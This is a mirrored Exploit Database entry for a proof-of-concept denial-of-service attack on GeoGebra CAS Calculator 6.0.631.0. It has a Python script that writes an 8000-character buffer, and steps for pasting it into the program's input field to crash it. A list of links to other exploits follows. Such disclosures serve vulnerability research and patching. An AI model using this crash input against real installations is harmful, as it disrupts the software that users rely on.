GeoGebra CAS Calculato‪r‬ 6.0.631.0 – Denial of Service (PoC)

Exploit Database
15 阅读

作者： Brian Rodriguez

日期： 2021-03-16
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/49655/

# Exploit Title: GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)
# Date: 2021-03-15
# Exploit Author: Brian Rodriguez
# Vendor Homepage: https://www.geogebra.org
# Software Link: https://www.geogebra.org/download
# Version: 6.0.631.0-offlinecas
# Tested on: Windows 8.1 Pro

# STEPS
# Open the program Calculadora CAS
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt in the field "Entrada..."
# Crashed

--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 8000

try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

last Exploits
GeoGebra CAS Calculato‪r‬ 6.0.631.0 – Denial of Service (PoC)的更多信息

KiTTY Portable 0.65.0.2p (Windows 7) – Local kitty.ini Overflow (Wow64 Egghunter)：
LibreOffice/Open Office – ‘.odt’ Information Disclosure：
Kite 1.2021.610.0 – Unquoted Service Path：
SOYAL 701 Server 9.0.1 – Insecure Permissions：
Microsoft Windows 10 – Child Process Restriction Mitigation Bypass：
VirtualBox 5.2.6.r120293 – VM Escape：
Faleemi Windows Desktop Software – (DDNS/IP) Local Buffer Overflow：
Spybot Search & Destroy 1.6.2 Security Center Service – Local Privilege Escalation：